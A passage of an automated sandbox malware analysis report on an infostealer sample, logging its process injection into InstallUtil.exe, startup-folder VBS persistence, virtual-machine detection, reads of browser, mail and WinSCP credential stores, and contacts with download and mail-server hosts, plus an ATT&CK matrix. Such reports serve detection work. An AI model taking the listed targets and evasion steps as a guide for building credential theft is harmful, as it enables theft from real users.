                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99531Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99203Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 99094Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98985Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98874Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98656Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98542Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98430Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98313Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98202Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 98094Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97844Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97703Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97594Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97484Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97360Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97140Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 97031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96922Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96813Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96703Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96594Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96485Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96360Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96235Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 96110Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95985Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95860Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95735Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95610Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95485Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95360Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95235Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 95110Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94985Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94860Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94735Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94610Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 94485Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: wscript.exe, 00000004.00000002.2457296736.000001A090784000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: vdvfyt.exe, 00000005.00000002.3359423857.000000000135B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: wscript.exe, 00000004.00000002.2457296736.000001A090784000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                      Source: Ref#60031796.exe, 00000000.00000002.2345387570.0000000000D92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: InstallUtil.exe, 00000003.00000002.3367500140.0000000005252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7F5008Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeQueries volume information: C:\Users\user\Desktop\Ref#60031796.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Users\user\AppData\Roaming\vdvfyt.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3361572023.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3361572023.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5716, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5716, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Ref#60031796.exe.3bce418.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#60031796.exe.3bce418.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3361572023.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3361572023.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5716, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts121
                      Windows Management Instrumentation
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      211
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Registry Run Keys / Startup Folder
                      2
                      Registry Run Keys / Startup Folder
                      2
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      311
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object Model1
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets141
                      Virtualization/Sandbox Evasion
                      SSHKeylogging23
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                      Process Injection
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567429 Sample: Ref#60031796.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 26 oshi.at 2->26 28 api.ipify.org 2->28 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 10 other signatures 2->44 7 Ref#60031796.exe 15 5 2->7         started        12 wscript.exe 1 2->12         started        signatures3 process4 dnsIp5 30 oshi.at 194.15.112.248, 443, 49715 INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB Ukraine 7->30 20 C:\Users\user\AppData\Roaming\vdvfyt.exe, PE32 7->20 dropped 22 C:\Users\user\...\vdvfyt.exe:Zone.Identifier, ASCII 7->22 dropped 24 C:\Users\user\AppData\Roaming\...\vdvfyt.vbs, ASCII 7->24 dropped 46 Drops VBS files to the startup folder 7->46 48 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->48 50 Writes to foreign memory regions 7->50 52 Injects a PE file into a foreign processes 7->52 14 InstallUtil.exe 14 2 7->14         started        54 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->54 18 vdvfyt.exe 14 2 12->18         started        file6 signatures7 process8 dnsIp9 32 162.254.34.31, 49759, 587 VIVIDHOSTINGUS United States 14->32 34 api.ipify.org 104.26.13.205, 443, 49751 CLOUDFLARENETUS United States 14->34 56 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->56 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->58 60 Tries to steal Mail credentials (via file / registry access) 14->60 66 2 other signatures 14->66 36 5.253.86.15, 443, 49779, 49973 HOSTSLICK-GERMANYNL Cyprus 18->36 62 Multi AV Scanner detection for dropped file 18->62 64 Machine Learning detection for dropped file 18->64 signatures10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Ref#60031796.exe13%ReversingLabs
                      Ref#60031796.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\vdvfyt.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\vdvfyt.exe13%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://oshi.at/Dwhm0%Avira URL Cloudsafe
                      https://oshi.at/Dwhml0%Avira URL Cloudsafe
                      https://oshi.at/Dwhmt0%Avira URL Cloudsafe
                      http://oshi.at0%Avira URL Cloudsafe
                      https://oshi.atD0%Avira URL Cloudsafe
                      https://oshi.at0%Avira URL Cloudsafe
                      http://oshi.atd0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      199.232.214.172
                      truefalse
                        high
                        oshi.at
                        194.15.112.248
                        truefalse
                          high
                          api.ipify.org
                          104.26.13.205
                          truefalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              high
                              https://oshi.at/Dwhmfalse
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://oshi.at/Dwhmtvdvfyt.exe, 00000005.00000002.3361181229.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://stackoverflow.com/q/14436606/23354Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://oshi.atvdvfyt.exe, 00000005.00000002.3361181229.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.0000000003276000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.0000000003218000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://account.dyn.com/Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/mgravell/protobuf-netJRef#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://oshi.at/Dwhmlvdvfyt.exe, 00000005.00000002.3361181229.00000000031AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ocsps.ssl.com0?Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                      high
                                      http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                        high
                                        https://github.com/mgravell/protobuf-netRef#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://oshi.atRef#60031796.exe, 00000000.00000002.2347570758.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.00000000031AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QRef#60031796.exe, vdvfyt.exe.0.drfalse
                                            high
                                            http://ocsps.ssl.com0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                              high
                                              http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                                high
                                                http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                                  high
                                                  https://api.ipify.org/tInstallUtil.exe, 00000003.00000002.3361572023.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                                      high
                                                      http://oshi.atdvdvfyt.exe, 00000005.00000002.3361181229.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.0000000003276000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.0000000003218000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://api.ipify.orgRef#60031796.exe, 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3361572023.0000000002861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crls.ssl.com/ssl.com-rsa-RootCA.crl0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                                          high
                                                          https://github.com/mgravell/protobuf-netiRef#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                                              high
